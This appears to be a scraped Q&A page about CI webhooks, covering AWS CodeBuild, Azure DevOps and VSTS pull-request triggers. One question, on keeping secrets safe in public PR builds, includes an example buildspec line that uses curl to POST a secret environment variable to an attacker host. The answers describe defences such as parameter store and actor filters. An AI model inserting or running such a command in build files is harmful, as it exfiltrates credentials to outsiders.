AWS CodeBuild - Get Webhook Body in buildspec.yml - github

If I have a build that triggered by a github webhook in AWS CodeBuild, is there a way for me to inspect the content of the webhook body that triggered the build from my buildspec.yml file? Or is this content just lost?

In order to trigger a codebuild build from Github, you're going to need to be able to consume post data from Github and translate that into a call to codebuild. In that translation layer, just take what you need from the webhook and apply it to your codebuild build environment. One of the ways you can pass data into your codebuild build is through environment variables. I am not sure how you intend to trigger codebuild builds, but I assume you would need a translation layer that consumes the webhook and ultimately launches a codebuild build.

This is not supported today. Providing webhook payload as a preconfigured environment variable is a feature request CodeBuild team is aware of. Relevant forum post here: https://forums.aws.amazon.com/thread.jspa?threadID=269699
Outside of buildspec, you could achieve this by looking at the "initiator" field of your CodeBuild console/UI or BatchGetBuilds API response. This will give the GitHub hookshot id which you may then use to look up your webhook payload in GitHub.

Related

Azure Devops GIthub webhooks

We had azure pipeline which use to work, but recently the PR trigger are not working.
Hence, I deleted webhooks from github repo. I created new service account and new pipeline with new service account. However, it does not seem to recreate webooks in github.
any thoughts?
Which model are you using, classic editor build or YAML build?
If you are using YAML build, we could select GitHub as source.
And we could specify the target branches when validating your pull requests. For example, to validate pull requests that target master and releases/*, you can use the following pr trigger.
pr:
- master
- releases/*
If you are using classic editor build. We could select the Pull request validation trigger and check the Enable pull request validation check box to enable builds on pull requests. Check the pic below.
We could refer to this doc for more details.

Automatically adding comments to all Pull Requests in Azure DevOps

Is there a way to automatically add comments to any pull requests created in Azure DevOps within a repository?
Is there a way to automatically add comments to any pull requests created in Azure DevOps within a repository?
I am afraid there is no such way to automatically add comments to any pull requests created in Azure DevOps within a repository.
That because we are currently unable to monitor the creation of pull requests in real time. And there is no similar extension to detect the creation of pull requests. In this case, we could set the action to add comment to the all pull requests.
To achieve this, we could try to add a Build Validation for each branch, and use the REST API Pull Request Thread Comments - Create to add comments to the pull requests.
POST https://dev.azure.com/{organization}/{project}/_apis/git/repositories/{repositoryId}/pullRequests/{pullRequestId}/threads/{threadId}/comments?api-version=5.1
You could check this thread for the details info about how to use this REST API.
In this case, if we create any pull request, it will invoke the Build Validation to use REST API to add comments to the pull request.
Our team had similar needs so I created an Azure DevOps task to do just that:
PR Auto-Comment (GitHub)
Just add the task to your PR build and you're good to go.
Depending on your exact need, you may be able to use the "Automatically included reviewers" functionality that you get with branch policy. It has a custom message that can be configured to be included in every PR.

How would I go about setting up a web hook listener on Azure DevOps?

Goal:
We have a Translation Management System project with a set of string translations, which can be exported as iOS, Android, and web formats. This can be done via its API, CLI, or manually with the UI. We need to integrate with our git-based repository, which lives in DevOps, so that when changes are made to the TMS translations, the code base is updated automatically (preferably a PR would be created with the changes).
What I Have Tried:
I am a mobile developer with little web hook experience, but it seems that they are the key to the solution. I can configure the web hook on the TMS side, but need to provide a URL with a listener. Going through the Azure DevOps service hooks settings and reading documentation extensively, I can't find any leads on a way to set up a custom listener to subscribe to another service's web hook, consume its payload, and trigger an action in DevOps.
I'm aware this may be limited by the capabilities of the TMS and DevOps, but how would this be tackled viewing it from a high level perspective? It doesn't seem like there's any built-in solution, so what would a custom solution entail? If something along the lines of what I'm looking for isn't possible, I would like to know that as well.
Thanks in advance!
So that when changes are made to the TMS translations, the code base
is updated automatically (preferably a PR would be created with the
changes).
Sorry but as I know it's not supported scenario in Azure Devops Service.
1.The service hooks option in azure devops service is that when something(event) happens in Azure Devops Service, it runs task(action) on target service. But what you want is when something happens in external service, it runs task(action) in azure devops service. For now this behavior is not supported.
2.And different service in Service Hooks has different supported actions. Let's take Jenkins service(one service hooks) as example, see step5 in trigger Jenkins: Azure Devops can trigger Jenkins build.
As for Web Hooks(another service hooks), it can't trigger actions like the code base is updated automatically. It just sends the Json representation.
So the scenario you want is not supported for now by Azure Devops Service.
In addition: Not sure about how your TMS works, but you can consider using Azure Devops Rest API to trigger actions in Azure Devops Service. (These rest apis can be used to queue build, release or do git-related actions )
When changes are made to your TMS translations, you may call corresponding Azure Devops rest api to manage git repos in Azure Devops if your TMS supports this kind of behavior.
Hope all above resolves your puzzle why your scenario is not supported by Web Hooks in Azure Devops:)
When you Authorize your GitHub repo through the devops settings, webhook will be automatically created on your repo with configurable hook events.

Prevent GitHub PR checks running without manual intervention

I have ran into a situation where I have a repo on GitHub that I am looking to make public.
Currently, one of the PR checks runs CI tests on AWS CodeBuild.
Because of the nature of the tests, there are environment variables that contain secrets. The results/logs from the build output will not be public, which is one good thing.
AWS CodeBuild uses the buildspec.yml file to run commands in CI.
If I were to have an environment variable, for example $SECRET_THING, an attacker would be able to simply open a PR, adding to buildspec.yml, for example:
- curl -X POST -d"thesecret=$SECRET_THING" https://mwahahahaha.com/grab_it
Which would then send themselves the secret.
Using either a setting in GitHub, the GitHub checks API or CodeBuild, is there a way that would require manual intervention to run the check, preferably after a code review? (eg. a button clickable only by an authorised collaborator on the PR page)
Don't use plain text environment variable, instead use "env > parameter-store" to store your secret. If you are using CodeBuild's console UI you can create the paramater store entry from "advanced > environment
variables > type: parameter store" https://aws.amazon.com/codebuild/latest/userguide/build-spec-ref.html#build-spec-ref-syntax
Also, CodeBuild allows you to define the buildspec as part of the project. This way the buildspec yml file is not present in your repository.
Note: CodeBuild only allows repo owner or admin to create the webhook.
Update: #Chris CodeBuild supports filter groups for PR builds. Documentation # https://docs.aws.amazon.com/codebuild/latest/userguide/sample-github-pull-request.html#sample-github-pull-request-filter-webhook-events-console. You can filter on the actor to ensure that only trusted collaborators can trigger a build for PR or push events.

Trigger Visual Studio Team Services build for a GitHub Pull Request

How do you get VSTS to build when a PR is created in GitHub? I've tried several triggers in the VSTS build like refs/pull/*/merge and refs/pull/*/head. I have a build working when a commit is made to the master branch, but I can't get a build to trigger when a PR is created.
I get the following when a PR is created.
Also, the webhook history shows that a message was successfully posted to VSTS, but the build never starts.
The official Microsoft VSTS GitHub Integration extension now supports this directly.
I think it's the trigger. Try what's described in this blog post.
There is not an easy way to enable this today for PRs. It is on the VSTS feature backlog that we want to address soon.
The way to make it work today would be to do something like: add a webhook to call your own custom service endpoint. Within your service endpoint, you could then call into VSTS to queue a build, and the build would need a step to post success/fail back to GitHub.
In your custom service endpoint, you would need to make sure the user is authorized as a contributor on the GitHub repo.
On the new VSTS UI you can find it in Build Edit -> Triggers: